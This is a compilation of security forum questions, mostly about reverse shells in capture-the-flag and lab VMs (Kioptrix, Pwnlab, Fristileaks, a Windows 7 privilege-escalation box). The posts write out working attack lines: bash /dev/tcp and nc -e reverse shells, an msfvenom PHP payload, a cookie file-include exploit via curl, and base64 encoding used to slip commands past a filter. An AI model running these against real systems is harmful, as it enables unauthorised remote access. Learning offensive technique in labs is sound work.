Will a Web Server detect a base64 encoded reverse shell on run time?

A vulnerable website blocks almost everything that is related to PE (Privilege Escalation), but when encoding the ls -al command into base64 format, the website doesn’t block the dangerous code (at Scan Time). Will the web server detect and block the code at Run Time?

base64 -d <<< bHMgLWFs | sh    # bHMgLWFs is the base64 of "ls -al"

Web Server: Scanning the input.. Seems fine, I will not block it.

Web Server Inside: ls -al   # Will it block it at run time?

Unable to start reverse shell over HTTP

I am able to get a reverse shell working locally over TCP, but failing to trigger it remotely over HTTP.

Locally over TCP:

  • Attacker terminal runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Target terminal sends an interactive bash shell to the attacker: bash -i >& /dev/tcp/localhost/8000 0>&1;
  • Success!

Remotely over HTTP:

  • Attacker runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Attacker runs ngrok to generate a web-facing IP: ./ngrok http --subdomain=example 8000
  • Target runs an interactive bash shell: bash -i >& /dev/tcp/example.ngrok.io/80 0>&1; (using port 80 because it’s HTTP)
  • The connection fails; I don’t even see any incoming traffic showing up on ngrok.

I also tried using netcat on the target machine, which unfortunately had the same result: /bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe (from this post)

Can anyone spot what I’m doing wrong?

Can’t one reverse engineer Chrome’s source code to reveal Widevine and friends’ keys?

If I understand correctly, Widevine, FairPlay and PlayReady are all security through obscurity. Given the popularity of services using them, can’t someone just RE them and find out exactly how they work? If so, was it done? If not, why? If this can be done, why do people continue using these services?

Related: How do Widevine, FairPlay, and other DRMs work under the hood?

Help Understanding PHP Reverse Shells

I have recently done two different hackable VMs and had to take, after reading walkthroughs, two different approaches.

For Fristileaks 1.3, it was simple. I was able to get login credentials to the website and upload a php reverse shell. I used msfvenom for the script:

msfvenom -p php/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xxx LPORT=xxxx -f raw > shell.php  

I had to rename the script from shell.php to shell.php.png because the site only let me upload pictures. Once I uploaded the script, I found the url for the picture/script, set up a netcat listener on my attacking machine, and then visited the page with the script and that was enough to establish a connection between the target and attacker.

It was much more difficult to establish a connection on the Pwnlab Init VM.

Again, I gained login access to the website’s upload page. I tried uploading the same reverse shell script but I was not able to get access after setting up a netcat listener.

What I had to do, ultimately, was upload a php backdoor script:

(/usr/share/webshells/php/simple-backdoor.php) 

Then, I had to exploit the below vulnerability on the index.php page, which allows for injection into the lang cookie:

if (isset($_COOKIE['lang'])) {
    include("lang/".$_COOKIE['lang']);
}

I then used the below curl query to pass the page with the uploaded PHP backdoor to the lang variable, and then netcat to my attacking machine, which I had already set to listen for a connection:

curl --output - -b lang=../upload/6a8c0c37efded4d620a5c59990f07b90.png http://xxx.xxx.xxx.xxx/index.php?cmd=/bin/nc+-e+/bin/sh+xxx.xxx.xxx.xxx+xxxx 

Can anybody shed any light on why it was so easy to establish a reverse shell in one instance and more involved in another? What is going on behind the scenes in the Pwnlab VM such that visiting the URL with the uploaded reverse shell script does not work, but exploiting the lang variable with a PHP backdoor is sufficient?

I suppose you just need to have a lot of tools at your disposal and keep trying until something works, but it would help to have a concept of why one approach works and another doesn’t.

I am a member of the Administrators group on a Windows 7 box, how can I spawn a reverse shell with elevated privileges?

I am learning Windows privilege escalation. I’ve managed to add a user to the Administrators group, but I don’t know how to execute nc.exe, present in the Temp dir, with elevated privileges. My end goal here is to get a reverse shell as nt authority\system with these newly created privileges for the user user.

Following are some of the details on the Windows box:

c:\Temp>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
TCM
user
The command completed successfully.

c:\Temp>whoami
whoami
tcm-pc\user

systeminfo

Host Name:                 TCM-PC
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          TCM
Registered Organization:
Product ID:                00371-221-2693053-06399
Original Install Date:     4/15/2020, 9:38:13 AM
System Boot Time:          6/17/2020, 9:13:27 PM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version:              Xen 4.2.amazon, 8/24/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,048 MB
Available Physical Memory: 1,413 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,409 MB
Virtual Memory: In Use:    686 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \TCM-PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
                           [03]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: AWS PV Network Device
                                 Connection Name: Local Area Connection 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.1
                                 IP address(es)
                                 [01]: 10.10.50.233
                                 [02]: fe80::f1df:5563:c002:f2c1

c:\Temp>netsh firewall show config
netsh firewall show config

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable

Service configuration for Domain profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          Remote Desktop

Allowed programs configuration for Domain profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Domain profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Domain profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Disable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable

Service configuration for Standard profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          File and Printer Sharing
Enable   No          Network Discovery
Enable   No          Remote Desktop

Allowed programs configuration for Standard profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Standard profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Standard profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Why use a reverse shell?

I know that a reverse shell lets the victim connect to us, but I heard that people mostly use reverse shells. Why use a reverse shell while hacking a network outside our local network, as we have to do port forwarding? It only brings some extra work.

Kioptrix 2: Why does a netcat reverse shell executed in the web browser via a command injection bug not work?

I’ve completed kioptrix level 2 challenge via bash reverse shell.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

; bash -i >& /dev/tcp/10.10.13.37/4444 0>&1 

My question is: why does a netcat reverse shell executed in the web browser via the command injection bug not work, when it was working just fine via the terminal?

My Setup

Kali - 10.10.13.37
Kioptrix 2 - 10.10.13.254

netcat listener

kali@kali:~$ nc -lp 4444

I’ve verified TCP port 4444 is open:

kali@kali:~$ ss -antp | g 4444
LISTEN 0      1            0.0.0.0:4444         0.0.0.0:*     users:(("nc",pid=3003,fd=3))
kali@kali:~$

The netcat reverse shell executed in the web browser via the command injection bug doesn’t work:

; nc 10.10.13.37 4444 ; nc 10.10.13.37 4444 -e /bin/sh 

No traffic at all:

kali@kali:~$ sudo tcpdump -nni eth0 port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes

However, when I repeat the same process with netcat executed from the Kioptrix 2 terminal, I am able to get the reverse shell set up on Kali.

[backdoor@kioptrix ~]$ nc 10.10.13.37 4444 -e /bin/sh

The reverse shell via the terminal is working fine:

kali@kali:~$ nc -lp 4444
id
uid=502(backdoor) gid=502(backdoor) groups=0(root),10(wheel),500(john),501(harold),502(backdoor)

tcpdump traffic; the last 4 packets were for the id command:

kali@kali:~$ sudo tcpdump -nni eth0 port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0
00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0
00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0
00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3
00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0
00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97
00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0